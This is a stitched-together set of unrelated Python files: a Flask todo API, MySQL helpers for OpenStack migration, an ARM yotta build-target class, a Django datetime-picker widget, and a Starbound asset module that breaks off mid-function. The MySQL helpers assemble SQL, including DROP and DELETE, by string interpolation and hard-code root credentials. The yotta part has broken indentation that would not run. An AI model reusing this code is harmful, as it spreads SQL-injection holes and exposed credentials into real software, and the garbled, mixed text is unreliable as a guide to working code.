def get_todo(todo_id):
    """Return one todo by id; 404 when unknown."""
    return jsonify({'todo': Todo.query.get_or_404(todo_id).to_json()})
@api.route('/todo/<int:todo_id>/', methods=['PUT'])
def update_todo_status(todo_id):
    """Update a todo's finished state from a JSON ``todo`` payload.

    When ``is_finished`` is truthy, ``finished_at`` is parsed from an
    ISO-8601 'Z' timestamp; otherwise it is cleared.
    """
    try:
        todo = Todo.query.get(todo_id)
        todo_json = request.json.get('todo')
        todo.is_finished = todo_json.get('is_finished')
        if todo.is_finished:
            todo.finished_at = datetime.strptime(
                todo_json.get('finished_at'), '%Y-%m-%dT%H:%M:%S.%fZ'
            )
        else:
            todo.finished_at = None
        todo.save()
    # BUGFIX: narrowed from a bare ``except:``.
    except Exception:
        abort(400)
    return jsonify({'todo': todo.to_json()})
@api.route('/todolist/<int:todolist_id>/', methods=['PUT'])
def change_todolist_title(todolist_id):
    """Rename a todolist from a JSON ``todolist.title``; 400 on failure."""
    try:
        todolist = TodoList.query.get(todolist_id)
        todolist_json = request.json.get('todolist')
        title = todolist_json.get('title')
        if TodoList.is_valid_title(title):
            todolist.change_title(title)
        else:
            abort(400)
    # BUGFIX: narrowed from a bare ``except:``.
    except Exception:
        abort(400)
    return jsonify({'todolist': todolist.to_json()})
@api.route('/user/<int:user_id>/', methods=['DELETE'])
@admin_required
def delete_user(user_id):
    """Delete a user (admin only); the payload must echo ``user_id``."""
    try:
        user = User.query.get(user_id)
        # require the id in the body to match the URL as a confirmation
        if user_id == request.json.get('user_id'):
            user.delete()
            return jsonify()
        else:
            abort(400)
    # BUGFIX: narrowed from a bare ``except:``.
    except Exception:
        abort(400)
@api.route('/todolist/<int:todolist_id>/', methods=['DELETE'])
@admin_required
def delete_todolist(todolist_id):
    """Delete a todolist (admin only); payload must echo ``todolist_id``."""
    try:
        todolist = TodoList.query.get(todolist_id)
        if todolist_id == request.json.get('todolist_id'):
            todolist.delete()
            return jsonify()
        else:
            abort(400)
    # BUGFIX: narrowed from a bare ``except:``.
    except Exception:
        abort(400)
@api.route('/todo/<int:todo_id>/', methods=['DELETE'])
@admin_required
def delete_todo(todo_id):
    """Delete a todo (admin only); the payload must echo ``todo_id``."""
    try:
        todo = Todo.query.get(todo_id)
        if todo_id == request.json.get('todo_id'):
            todo.delete()
            return jsonify()
        else:
            abort(400)
    # BUGFIX: narrowed from a bare ``except:``.
    except Exception:
        abort(400)
| |
import threading
from oslo.config import cfg
__author__ = 'hydezhang'
import MySQLdb
import base64
from DBUtils.PooledDB import PooledDB
import logging
# Module-level logger for the database helpers below.
LOG = logging.getLogger(__name__)
db_pool = None
# BUGFIX: the original functions created a fresh threading.Lock() inside
# each call, which never provided mutual exclusion. A single shared
# module-level lock guards creation/teardown of the pool.
_db_pool_lock = threading.Lock()


def create_db_pool(db_name=None):
    """Create the shared MySQL connection pool (idempotent, thread-safe).

    :param db_name: database to use; defaults to the configured
        ``DATABASE.db_name`` option.
    """
    credentials = get_db_credentials()
    db_name = str(cfg.CONF.DATABASE.db_name) if db_name is None else db_name
    credentials.update({'db': db_name})
    global db_pool
    with _db_pool_lock:
        if db_pool is None:
            db_pool = PooledDB(MySQLdb, 100, **credentials)


def release_db_pool():
    """Close and discard the shared connection pool, if one exists."""
    global db_pool
    with _db_pool_lock:
        if db_pool is not None:
            db_pool.close()
            db_pool = None
def get_db_credentials():
    """Build MySQL credentials from config (password is base64-encoded)."""
    decoded_password = base64.b64decode(cfg.CONF.DATABASE.mysql_password)
    return {'host': str(cfg.CONF.DATABASE.host),
            'user': str(cfg.CONF.DATABASE.user),
            'passwd': str(decoded_password)}
def connect(with_db, db_name=None):
    """Return a database connection.

    :param with_db: flag to indicate whether to connect to
        a particular database or not -- when true the pooled connection
        is used, otherwise a raw server-level connection is opened.
    """
    if not with_db:
        return MySQLdb.connect(**get_db_credentials())
    return db_pool.connection()
def connect_openstack_db(host, db_name):
    """Open a raw connection to an OpenStack MySQL database.

    NOTE(review): credentials are hard-coded here -- they should come
    from configuration; flagged, behavior left unchanged.
    """
    return MySQLdb.connect(host=host,
                           user='root',
                           passwd='password',
                           db=db_name)
def read_openstack_record(host, db_name, table_name, columns, where_dict,
                          close):
    """SELECT ``columns`` from an OpenStack table, optionally filtered."""
    db = connect_openstack_db(host, db_name)
    cursor = get_cursor(db)
    columns_str = ', '.join(columns)
    if len(where_dict.keys()) > 0:
        query = "SELECT {0} FROM {1} WHERE {2}".format(
            columns_str, table_name, build_where_string(where_dict))
    else:
        query = "SELECT {0} FROM {1} ".format(columns_str, table_name)
    data = None
    try:
        cursor.execute(query)
        data = cursor.fetchall()
    except MySQLdb.Error as e:
        LOG.error("MySQL error: {}".format(e))
        db.rollback()
    if close:
        db.close()
    return data
def update_openstack_record(host, db_name, table_name, set_dict, where_dict,
                            close):
    """UPDATE rows of an OpenStack table matching ``where_dict``."""
    db = connect_openstack_db(host, db_name)
    cursor = get_cursor(db)
    # assemble the SET clause in one pass instead of manual comma logic
    assignments = []
    for key in set_dict.keys():
        assignments.append(str(key) + " = '" + str(set_dict[key]) + "'")
    set_str = ', '.join(assignments)
    filter_str = build_where_string(where_dict)
    query = "UPDATE {0} SET {1} WHERE {2}" \
        .format(table_name, set_str, filter_str)
    try:
        cursor.execute(query)
        db.commit()
    except MySQLdb.Error as e:
        LOG.error("MySql error: {}".format(e))
        db.rollback()
    if close:
        db.close()
def insert_openstack_record(host, db_name, table_name, values, close):
    """INSERT each mapping in ``values`` as a row of an OpenStack table."""
    db = connect_openstack_db(host, db_name)
    cursor = get_cursor(db)
    for item in values:
        # preserve key order: columns and values are joined in lockstep
        columns = item.keys()
        columns_str = ', '.join(columns)
        values_str = ', '.join([add_quotes(item[col]) for col in columns])
        query = "INSERT INTO {0} ({1}) VALUES ({2})"\
            .format(table_name, columns_str, values_str)
        try:
            cursor.execute(query)
            db.commit()
        except MySQLdb.Error as e:
            LOG.error("MySql error - INSERT: {}".format(e))
            db.rollback()
    if close:
        db.close()
def delete_openstack_record(host, db_name, table_name, where_dict, close):
    """DELETE rows of an OpenStack table matching ``where_dict``."""
    db = connect_openstack_db(host, db_name)
    cursor = get_cursor(db)
    query = "DELETE FROM {0} WHERE {1}".format(
        table_name, build_where_string(where_dict))
    try:
        cursor.execute(query)
        db.commit()
    except MySQLdb.Error as e:
        LOG.error("MySQL error - DELETE SOME: {}".format(e))
        db.rollback()
    if close:
        db.close()
def get_cursor(db):
    # Thin wrapper around db.cursor(), kept for symmetry with the helpers.
    return db.cursor()
def check_db_exist(db_name):
    """Return True when a database named ``db_name`` exists.

    BUGFIX: the raw connection opened here was never closed, leaking a
    server connection on every call.
    """
    db = connect(False)
    cursor = get_cursor(db)
    query_check = "SHOW DATABASES LIKE {}".format(add_quotes(db_name))
    result = cursor.execute(query_check)
    cursor.close()
    db.close()
    return True if result else False
def delete_database(db_name):
    """DROP the given database when it exists; no-op otherwise.

    BUGFIX: the connection was only closed on the success path; it is now
    closed in a ``finally`` so the error path no longer leaks it.
    """
    db = connect(False)
    cursor = get_cursor(db)
    result = check_db_exist(db_name)
    if not result:
        LOG.info("Database {} does not exist".format(db_name))
        cursor.close()
        db.close()
        return
    query_delete = 'DROP DATABASE {} '.format(db_name)
    try:
        cursor.execute(query_delete)
        db.commit()
    except MySQLdb.Error as e:
        print("MySQL error - Database deleting: {}".format(e))
        db.rollback()
    finally:
        db.close()
def create_database(db_name):
    """CREATE the given database when it does not already exist.

    BUGFIX: the connection was only closed on the success path; it is now
    closed in a ``finally`` so the error path no longer leaks it.
    """
    db = connect(False)
    cursor = get_cursor(db)
    result = check_db_exist(db_name)
    if result:
        LOG.info("Database {} already exists".format(db_name))
        cursor.close()
        db.close()
        return
    query_create = 'CREATE DATABASE IF NOT EXISTS {} '.format(db_name)
    try:
        cursor.execute(query_create)
        db.commit()
    except MySQLdb.Error as e:
        print("MySQL error - Database creation: {}".format(e))
        db.rollback()
    finally:
        db.close()
def delete_table(table_name):
    """DROP a table if it exists; connection is always closed."""
    if not check_table_exist(table_name):
        return
    db = connect(True)
    cursor = get_cursor(db)
    drop_query = "DROP TABLE {0} ".format(table_name)
    try:
        cursor.execute(drop_query)
        db.commit()
    except MySQLdb.Error as e:
        LOG.error("MySql error - Table creation: {}".format(e))
        db.rollback()
    finally:
        db.close()
def create_table(table_name, columns, close):
    """
    function to create database table
    :param table_name: name of the table to be created
    :param columns: columns of the table
    :param close: flag to indicate whether to close db connection
    """
    db = connect(True)
    cursor = get_cursor(db)
    create_query = "CREATE TABLE IF NOT EXISTS {0} ({1}) ".format(table_name,
                                                                  columns)
    try:
        cursor.execute(create_query)
        db.commit()
    except MySQLdb.Error as e:
        LOG.error("MySql error - Table creation: {}".format(e))
        db.rollback()
    if close:
        db.close()
def insert_record(table_name, values, close):
    """
    function to do table insert
    :param table_name: name of the table to be effected
    :param values: list of dictionaries of column and value pair
    :param close: flag to indicate whether to close db connection
    """
    db = connect(True)
    cursor = get_cursor(db)
    for item in values:
        # columns and values are joined in the same key order
        columns = item.keys()
        columns_str = ', '.join(columns)
        values_str = ', '.join([add_quotes(item[col]) for col in columns])
        query = "INSERT INTO {0} ({1}) VALUES ({2})"\
            .format(table_name, columns_str, values_str)
        try:
            cursor.execute(query)
            db.commit()
        except MySQLdb.Error as e:
            LOG.error("MySql error - INSERT: {}".format(e))
            db.rollback()
    if close:
        db.close()
def update_table(table_name, set_dict, where_dict, close):
    """function to do update record in table
    :param table_name: name of the table to be effected
    :param set_dict: set dictionary
    :param where_dict: where dictionary
    :param close: flag to indicate whether to close db connection

    BUGFIX: the first column's assignment used to be seeded into the SET
    string and then appended *again* by the loop over all keys, producing
    a duplicated column assignment in the generated SQL.
    """
    db = connect(True)
    cursor = get_cursor(db)
    # building "SET" string -- each key exactly once
    assignments = [str(key) + " = " + add_quotes(str(set_dict[key]))
                   for key in set_dict.keys()]
    set_str = ', '.join(assignments)
    filter_str = build_where_string(where_dict)
    query = "UPDATE {0} SET {1} WHERE {2}" \
        .format(table_name, set_str, filter_str)
    try:
        cursor.execute(query)
        db.commit()
    except MySQLdb.Error as e:
        LOG.error("MySql error - UPDATE: {}".format(e))
        db.rollback()
    if close:
        db.close()
def build_where_string(where_dict):
    """Build an SQL WHERE expression: AND-joined equality clauses.

    NOTE(review): values are interpolated, not parameterized -- unsafe
    with untrusted input; flagged, behavior left unchanged.
    """
    clauses = []
    for key in where_dict.keys():
        clauses.append(str(key) + " = '" + str(where_dict[key]) + "'")
    return ' AND '.join(clauses)
def read_record(table_name, columns, where_dict, close):
    """
    function that implements SELECT statement
    :param table_name: name of the table to read data from
    :param close: flag to indicate whether to close db connection
    :param columns: columns from which the data is selected
    :param where_dict: where dictionary
    """
    db = connect(True)
    cursor = get_cursor(db)
    filter_str = build_where_string(where_dict) if where_dict else None
    # build columns list
    columns_str = ', '.join(columns)
    if filter_str:
        query = "SELECT {0} FROM {1} WHERE {2}".format(columns_str, table_name,
                                                       filter_str)
    else:
        query = "SELECT {0} FROM {1} ".format(columns_str, table_name)
    data = None
    try:
        cursor.execute(query)
        data = cursor.fetchall()
    except MySQLdb.Error as e:
        LOG.error("MySQL error - SELECT: {}".format(e))
        db.rollback()
    # BUGFIX: the original condition ``data and len(data) == 0`` could
    # never be true (an empty result is falsy), so the notice below was
    # unreachable.
    if data is not None and len(data) == 0:
        print("no migration record found for {0} where {1}"
              .format(table_name, filter_str))
    if close:
        db.close()
    return data
def delete_all_data(table_name):
    """
    function that delete all data from a table
    """
    db = connect(True)
    cursor = get_cursor(db)
    delete_query = "DELETE FROM {0}".format(table_name)
    try:
        cursor.execute(delete_query)
        db.commit()
    except MySQLdb.Error as e:
        LOG.error("MySQL error - DELETE ALL: {}".format(e))
        db.rollback()
    db.close()
def delete_record(table_name, where_dict):
    """
    function that delete all data from a table
    (rows matching ``where_dict`` when provided, every row otherwise)
    """
    db = connect(True)
    cursor = get_cursor(db)
    if where_dict and len(where_dict.keys()) > 0:
        query = "DELETE FROM {0} WHERE {1}".format(
            table_name, build_where_string(where_dict))
    else:
        query = "DELETE FROM {}".format(table_name)
    try:
        cursor.execute(query)
        db.commit()
    except MySQLdb.Error as e:
        LOG.error("MySQL error - DELETE SOME: {}".format(e))
        db.rollback()
    db.close()
def check_table_exist(table_name):
    """
    function that checks whether a table exists
    """
    db = connect(True)
    cursor = get_cursor(db)
    quoted_name = "'" + table_name + "'"
    result = cursor.execute("SHOW TABLES LIKE {}".format(quoted_name))
    db.close()
    return True if result else False
def check_record_exist(table_name, where_dict):
    """Return True when at least one row matches ``where_dict``."""
    db = connect(True)
    cursor = get_cursor(db)
    query = "SELECT * FROM {0} WHERE {1}".format(
        table_name, build_where_string(where_dict))
    result = cursor.execute(query)
    db.close()
    return True if result else False
def add_quotes(string):
    """Return ``string`` converted with str() and wrapped in single quotes."""
    return "'{0}'".format(str(string))
| |
# Copyright 2014 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
# standard library modules, , ,
import json
import os
import signal
import subprocess
import logging
import string
import traceback
import errno
# version, , represent versions and specifications, internal
import version
# Pack, , common parts of Components/Targets, internal
import pack
# Filename of a target's description file within its directory.
Target_Description_File = 'target.json'
# Registry namespace under which targets are published.
Registry_Namespace  = 'targets'
def _ignoreSignal(signum, frame):
logging.debug('ignoring signal %s, traceback:\n%s' % (
signum, ''.join(traceback.format_list(traceback.extract_stack(frame)))
))
def _newPGroup():
    # Put the calling process into a new process group; presumably used
    # as a subprocess preexec_fn so children don't receive our signals --
    # TODO confirm at the call site.
    os.setpgrp()
# API
class Target(pack.Pack):
    def __init__(self, path, installed_linked=False, latest_suitable_version=None):
        ''' Initialise a Target based on a directory. If the directory does not
            contain a valid target.json file the initialised object will test
            false, and will contain an error property containing the failure.
        '''
        # !!! TODO: implement a target.json schema, and pass schema_filename
        # here:
        super(Target, self).__init__(
                              path,
            description_filename = Target_Description_File,
                  installed_linked = installed_linked,
           latest_suitable_version = latest_suitable_version
        )
def dependencyResolutionOrder(self):
''' Return a sequence of names that should be used when resolving
dependencies: if specific dependencies exist for
'''
return [self.description['name']] + self.description['similarTo']
def getToolchainFile(self):
return os.path.join(self.path, self.description['toolchain'])
#def getLinkScriptFile(self):
# return os.path.join(self.path, self.description['linkscript'])
    def getRegistryNamespace(self):
        # Targets live under the 'targets' namespace in the registry.
        return Registry_Namespace
@classmethod
def addBuildOptions(cls, parser):
parser.add_argument('-G', '--cmake-generator', dest='cmake_generator',
default=('Unix Makefiles', 'Ninja')[os.name == 'nt'],
choices=(
'Unix Makefiles',
'Ninja',
'Xcode',
'Sublime Text 2 - Ninja',
'Sublime Text 2 - Unix Makefiles'
)
)
@classmethod
def overrideBuildCommand(cls, generator_name):
# when we build using cmake --build, the nice colourised output is lost
# - so override with the actual build command for command-line
# generators where people will care:
try:
return {
'Unix Makefiles': ['make'],
'Ninja': ['ninja']
}[generator_name]
except KeyError:
return None
def hintForCMakeGenerator(self, generator_name, component):
try:
name = self.getName()
component_name = component.getName()
return {
'Xcode':
'to open the built project, run:\nopen ./build/%s/%s.xcodeproj' % (name, component_name),
'Sublime Text 2 - Ninja':
'to open the built project, run:\nopen ./build/%s/%s.??' % (name, component_name),
'Sublime Text 2 - Unix Makefiles':
'to open the built project, run:\nopen ./build/%s/%s.??' % (name, component_name)
}[generator_name]
except KeyError:
return None
def exec_helper(self, cmd, builddir):
    ''' Run *cmd* in *builddir* and wait for it. Returns None on success,
        otherwise a human-readable error message string. '''
    try:
        child = subprocess.Popen(cmd, cwd=builddir)
        child.wait()
    except OSError as e:
        if e.errno != errno.ENOENT:
            return 'command %s failed' % (cmd)
        # the executable itself could not be found
        if cmd[0] == 'cmake':
            return 'CMake is not installed, please follow the installation instructions at http://docs.yottabuild.org/#installing'
        return '%s is not installed' % (cmd[0])
    if child.returncode:
        return 'command %s failed' % (cmd)
    return None
def build(self, builddir, component, args, release_build=False, build_args=None):
    ''' Execute the commands necessary to build this component, and all of
        its dependencies.

        Generator: yields a human-readable error string for each step that
        fails; yielding nothing means the build succeeded.
    '''
    if build_args is None:
        build_args = []
    # in the future this may be specified in the target description, but
    # for now we only support cmake, so everything is simple:
    build_type = ('Debug', 'RelWithDebInfo')[release_build]
    # NOTE(review): build_type is always a non-empty string here, so the
    # else branch is currently unreachable; kept in case the tuple changes.
    if build_type:
        cmd = ['cmake', '-D', 'CMAKE_BUILD_TYPE=%s' % build_type, '-G', args.cmake_generator, '.']
    else:
        cmd = ['cmake', '-G', args.cmake_generator, '.']
    res = self.exec_helper(cmd, builddir)
    if res is not None:
        yield res
    # cmake error: the generated Ninja build file will not work on windows when arguments are read from
    # a file (@file) instead of the command line, since '\' in @file is interpreted as an escape sequence.
    # !!! FIXME: remove this once http://www.cmake.org/Bug/view.php?id=15278 is fixed!
    if args.cmake_generator == "Ninja" and os.name == 'nt':
        logging.debug("Converting back-slashes in build.ninja to forward-slashes")
        build_file = os.path.join(builddir, "build.ninja")
        # We want to convert back-slashes to forward-slashes, except in macro definitions, such as
        # -DYOTTA_COMPONENT_VERSION = \"0.0.1\". So we use a little trick: first we change all \"
        # strings to an unprintable ASCII char that can't appear in build.ninja (in this case \1),
        # then we convert all the back-slashed to forward-slashes, then we convert '\1' back to \".
        try:
            # BUG FIX: use a context manager so the handle is closed even on
            # error, and catch Exception rather than a bare `except:` (which
            # also swallowed KeyboardInterrupt/SystemExit).
            with open(build_file, "r+t") as f:
                data = f.read()
                data = data.replace('\\"', '\1')
                data = data.replace('\\', '/')
                data = data.replace('\1', '\\"')
                f.seek(0)
                f.write(data)
        except Exception:
            yield 'Unable to update "%s", aborting' % build_file
    build_command = self.overrideBuildCommand(args.cmake_generator)
    if build_command:
        cmd = build_command + build_args
    else:
        cmd = ['cmake', '--build', builddir] + build_args
    res = self.exec_helper(cmd, builddir)
    if res is not None:
        yield res
    hint = self.hintForCMakeGenerator(args.cmake_generator, component)
    if hint:
        logging.info(hint)
def debug(self, builddir, program):
    ''' Launch a debugger for the specified program.

        Generator: yields human-readable error strings on failure and
        nothing on success. Requires the target description to provide a
        'debug' command template; optionally starts a debug server first.
    '''
    if 'debug' not in self.description:
        yield "Target %s does not specify debug commands" % self
        return
    prog_path = os.path.join(builddir, program)
    if not os.path.isfile(prog_path):
        # The program doesn't exist: try to suggest what the user probably
        # meant (a built binary instead of its source file, or a path
        # under ./source).
        suggestion = None
        if (prog_path.endswith('.c') or prog_path.endswith('.m')) and os.path.isfile(prog_path[:-2]):
            suggestion = program[:-2]
        elif (prog_path.endswith('.cpp') or prog_path.endswith('.cxx')) and os.path.isfile(prog_path[:-4]):
            suggestion = program[:-4]
        elif os.path.isfile(os.path.join(builddir, 'source', program)):
            suggestion = os.path.join('source', program)
        if suggestion is not None:
            yield "%s does not exist, perhaps you meant %s" % (program, suggestion)
        else:
            yield "%s does not exist" % program
        return
    # Discard the debug server's output; keep handles so we can clean up in
    # the finally clause below.
    with open(os.devnull, "w") as dev_null:
        daemon = None
        child = None
        try:
            # debug-server is the old name, debugServer is the new name
            debug_server_prop = 'debugServer'
            if not debug_server_prop in self.description:
                debug_server_prop = 'debug-server'
            if debug_server_prop in self.description:
                logging.debug('starting debug server...')
                # _newPGroup is defined elsewhere in this module; presumably
                # it detaches the server into its own process group so our
                # Ctrl-C doesn't reach it -- TODO confirm.
                daemon = subprocess.Popen(
                    self.description[debug_server_prop],
                    cwd = builddir,
                    stdout = dev_null,
                    stderr = dev_null,
                    preexec_fn = _newPGroup
                )
            else:
                daemon = None
            # Ignore SIGINT in this process so Ctrl-C only interrupts the
            # debugger child; restored to SIG_DFL in the finally clause.
            signal.signal(signal.SIGINT, _ignoreSignal);
            # Substitute $program in each element of the command template
            # (safe_substitute leaves unknown variables untouched), then
            # expand environment variables.
            cmd = [
                os.path.expandvars(string.Template(x).safe_substitute(program=prog_path))
                for x in self.description['debug']
            ]
            logging.debug('starting debugger: %s', cmd)
            child = subprocess.Popen(
                cmd, cwd = builddir
            )
            child.wait()
            if child.returncode:
                yield "debug process executed with status %s" % child.returncode
            # Mark the child as finished so the finally clause doesn't try
            # to terminate it again.
            child = None
        except:
            # reset the terminal, in case the debugger has screwed it up
            os.system('reset')
            raise
        finally:
            # Terminate whatever is still running and restore SIGINT.
            if child is not None:
                child.terminate()
            if daemon is not None:
                logging.debug('shutting down debug server...')
                daemon.terminate()
            # clear the sigint handler
            signal.signal(signal.SIGINT, signal.SIG_DFL);
| |
__author__ = 'Alfredo Saglimbeni'
from datetime import datetime
import re
import uuid
from django.forms import forms, widgets
from django.forms.widgets import MultiWidget, DateTimeInput, DateInput, TimeInput
from django.utils.formats import get_format, get_language
from django.utils.safestring import mark_safe
from django.utils.six import string_types
try:
from django.forms.widgets import to_current_timezone
except ImportError:
to_current_timezone = lambda obj: obj # passthrough, no tz support
# This should be updated as more .po files are added to the datetime picker javascript code
supported_languages = set([
    'ar',
    'bg',
    'ca', 'cs',
    'da', 'de',
    'ee', 'el', 'es',
    'fi', 'fr',
    'he', 'hr', 'hu',
    'id', 'is', 'it',
    'ja',
    'ko', 'kr',
    'lt', 'lv',
    'ms',
    'nb', 'nl', 'no',
    'pl', 'pt-BR', 'pt',
    'ro', 'rs', 'rs-latin', 'ru',
    'sk', 'sl', 'sv', 'sw',
    'th', 'tr',
    'ua', 'uk',
    'zh-CN', 'zh-TW',
])


def get_supported_language(language_country_code):
    """Map django's 'language-countryCode' string to a language code the
    datepicker javascript actually ships translations for.

    Tries the full code first (some entries such as 'zh-CN' include the
    country), then just the language part, and finally falls back to 'en'
    rather than letting the picker silently default on an unknown code.
    """
    # Catch empty strings (and None) in case one sneaks in.
    if not language_country_code:
        return 'en'
    base_language = language_country_code.split('-')[0]
    for candidate in (language_country_code, base_language):
        if candidate in supported_languages:
            return candidate
    # Otherwise return English as the default.
    return 'en'
# Mapping from bootstrap-datetimepicker (javascript) format tokens to Python
# strptime/strftime directives; used to derive a Python parsing format from a
# user-supplied javascript format.
dateConversiontoPython = {
    'P': '%p',
    'ss': '%S',
    'ii': '%M',
    'hh': '%H',
    'HH': '%I',
    'dd': '%d',
    'mm': '%m',
    'yy': '%y',
    'yyyy': '%Y',
}

# Matches any of the javascript tokens above, on word boundaries.
toPython_re = re.compile(r'\b(' + '|'.join(dateConversiontoPython.keys()) + r')\b')

# Inverse mapping: Python directives to javascript tokens; used when
# localising (converting django's Python date format for the picker).
dateConversiontoJavascript = {
    '%M': 'ii',
    '%m': 'mm',
    '%I': 'HH',
    '%H': 'hh',
    '%d': 'dd',
    '%Y': 'yyyy',
    '%y': 'yy',
    '%p': 'P',
    '%S': 'ss'
}

# (?<!\w) rather than \b on the left because '%' is not a word character.
toJavascript_re = re.compile(r'(?<!\w)(' + '|'.join(dateConversiontoJavascript.keys()) + r')\b')
BOOTSTRAP_INPUT_TEMPLATE = {
2: """
<div id="%(id)s" class="controls input-append date">
%(rendered_widget)s
%(clear_button)s
<span class="add-on"><i class="icon-th"></i></span>
</div>
<script type="text/javascript">
$("#%(id)s").datetimepicker({%(options)s});
</script>
""",
3: """
<div id="%(id)s" class="input-group date">
%(rendered_widget)s
%(clear_button)s
<span class="input-group-addon"><span class="glyphicon %(glyphicon)s"></span></span>
</div>
<script type="text/javascript">
$("#%(id)s").datetimepicker({%(options)s}).find('input').addClass("form-control");
</script>
"""
}
CLEAR_BTN_TEMPLATE = {2: """<span class="add-on"><i class="icon-remove"></i></span>""",
3: """<span class="input-group-addon"><span class="glyphicon glyphicon-remove"></span></span>"""}
# Options whose values, when given as Python strings, must be single-quoted
# in the generated javascript (some also accept numbers, which `quote`
# passes through unchanged).
quoted_options = set([
    'format',
    'startDate',
    'endDate',
    'startView',
    'minView',
    'maxView',
    'todayBtn',
    'language',
    'pickerPosition',
    'viewSelect',
    'initialDate',
    'weekStart',
    # BUG FIX: a missing comma here used to concatenate the two literals
    # into 'minuteStepdaysOfWeekDisabled', so neither option was quoted.
    'minuteStep',
    'daysOfWeekDisabled',
])

# to translate boolean object to javascript
quoted_bool_options = set([
    'autoclose',
    'todayHighlight',
    'showMeridian',
    'clearBtn',
])
def quote(key, value):
    """Render a Python option value as javascript source text.

    String values of options in `quoted_options` are wrapped in single
    quotes (those options can also take numbers, hence the type check);
    booleans of options in `quoted_bool_options` become 'true'/'false';
    everything else is returned untouched.
    """
    if isinstance(value, string_types) and key in quoted_options:
        return "'%s'" % value
    if isinstance(value, bool) and key in quoted_bool_options:
        return 'true' if value else 'false'
    return value
class PickerWidgetMixin(object):
    """Shared behaviour for the bootstrap-datetimepicker form widgets.

    Subclasses set `format_name` (a django format-system key such as
    'DATE_INPUT_FORMATS') and `glyphicon` (icon for the bootstrap-3 addon).
    """

    format_name = None
    glyphicon = None

    def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
        # Only bootstrap 2 and 3 markup exists; anything else falls back to 2.
        if bootstrap_version in [2,3]:
            self.bootstrap_version = bootstrap_version
        else:
            # default 2 to mantain support to old implemetation of django-datetime-widget
            self.bootstrap_version = 2

        if attrs is None:
            attrs = {'readonly': ''}

        self.options = options

        self.is_localized = False
        self.format = None

        # We want to have a Javascript style date format specifier in the options dictionary and we
        # want a Python style date format specifier as a member variable for parsing the date string
        # from the form data
        if usel10n is True:

            # If we're doing localisation, get the local Python date format and convert it to
            # Javascript data format for the options dictionary
            self.is_localized = True

            # Get format from django format system
            self.format = get_format(self.format_name)[0]

            # Convert Python format specifier to Javascript format specifier
            self.options['format'] = toJavascript_re.sub(
                lambda x: dateConversiontoJavascript[x.group()],
                self.format
            )

            # Set the local language
            self.options['language'] = get_supported_language(get_language())

        else:

            # If we're not doing localisation, get the Javascript date format provided by the user,
            # with a default, and convert it to a Python data format for later string parsing
            format = self.options['format']
            self.format = toPython_re.sub(
                lambda x: dateConversiontoPython[x.group()],
                format
            )

        super(PickerWidgetMixin, self).__init__(attrs, format=self.format)

    def render(self, name, value, attrs=None):
        """Render the input element plus the datetimepicker activation script."""
        final_attrs = self.build_attrs(attrs)
        rendered_widget = super(PickerWidgetMixin, self).render(name, value, final_attrs)

        #if not set, autoclose have to be true.
        self.options.setdefault('autoclose', True)

        # Build javascript options out of python dictionary
        options_list = []
        for key, value in iter(self.options.items()):
            options_list.append("%s: %s" % (key, quote(key, value)))
        js_options = ",\n".join(options_list)

        # Use provided id or generate hex to avoid collisions in document
        id = final_attrs.get('id', uuid.uuid4().hex)

        # Render the clear button unless the clearBtn option quotes to
        # something other than 'true' (shown by default).
        clearBtn = quote('clearBtn', self.options.get('clearBtn', 'true')) == 'true'

        return mark_safe(
            BOOTSTRAP_INPUT_TEMPLATE[self.bootstrap_version]
            % dict(
                id=id,
                rendered_widget=rendered_widget,
                clear_button=CLEAR_BTN_TEMPLATE[self.bootstrap_version] if clearBtn else "",
                glyphicon=self.glyphicon,
                options=js_options
            )
        )

    def _media(self):
        # Picker script plus a locale file for non-English languages;
        # the stylesheet is shared by all locales.
        js = ["js/bootstrap-datetimepicker.js"]
        language = self.options.get('language', 'en')
        if language != 'en':
            js.append("js/locales/bootstrap-datetimepicker.%s.js" % language)
        return widgets.Media(
            css={
                'all': ('css/datetimepicker.css',)
            },
            js=js
        )
    media = property(_media)
class DateTimeWidget(PickerWidgetMixin, DateTimeInput):
    """Combined date + time picker widget for DateTime form fields."""

    format_name = 'DATETIME_INPUT_FORMATS'
    glyphicon = 'glyphicon-th'

    def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
        options = {} if options is None else options
        # Default javascript format covering both the date and time parts.
        options.setdefault('format', 'dd/mm/yyyy hh:ii')
        super(DateTimeWidget, self).__init__(attrs, options, usel10n, bootstrap_version)
class DateWidget(PickerWidgetMixin, DateInput):
    """Date-only picker widget: renders just the calendar views."""

    format_name = 'DATE_INPUT_FORMATS'
    glyphicon = 'glyphicon-calendar'

    def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
        options = {} if options is None else options
        # Open on the month view and never drill below it into time views.
        options.setdefault('startView', 2)
        options.setdefault('minView', 2)
        options.setdefault('format', 'dd/mm/yyyy')
        super(DateWidget, self).__init__(attrs, options, usel10n, bootstrap_version)
class TimeWidget(PickerWidgetMixin, TimeInput):
    """Time-only picker widget: renders just the hour/minute views."""

    format_name = 'TIME_INPUT_FORMATS'
    glyphicon = 'glyphicon-time'

    def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
        options = {} if options is None else options
        # Restrict navigation to the time views only.
        options.setdefault('startView', 1)
        options.setdefault('minView', 0)
        options.setdefault('maxView', 1)
        options.setdefault('format', 'hh:ii')
        super(TimeWidget, self).__init__(attrs, options, usel10n, bootstrap_version)
| |
"""
Module for reading and indexing Starbound assets
"""
import os
import json
import re
import sqlite3
import logging
import starbound
import starbound.btreedb4
from assets.blueprints import Blueprints
from assets.items import Items
from assets.species import Species
from assets.player import Player
from assets.monsters import Monsters
from assets.techs import Techs
from assets.images import Images
from assets.frames import Frames
from assets.common import asset_category
# Regular expression for comments
# NOTE(review): the first alternative looks like it was meant to skip
# backslash-escape pairs inside strings (\\ followed by any char) -- the
# current pattern escapes '[' instead; confirm before changing.
comment_re = re.compile(
    '("(\\[\s\S]|[^"])*")|((^)?[^\S\n]*/(?:\*(.*?)\*/[^\S\n]*|/[^\n]*)($)?)',
    re.DOTALL | re.MULTILINE
)

ignore_assets = re.compile(".*\.(db|ds_store|ini|psd|patch)", re.IGNORECASE)


def parse_json(content, key):
    """Decode *content* as JSON after stripping // and /* */ comments.

    Quoted strings are preserved intact (so '//' inside JSON string values
    survives). *key* identifies the asset; it is unused here.
    """
    decoder = json.JSONDecoder(strict=False)

    def _strip_comment(match):
        # keep a matched string literal, drop a matched comment
        return match.group(1) or ''

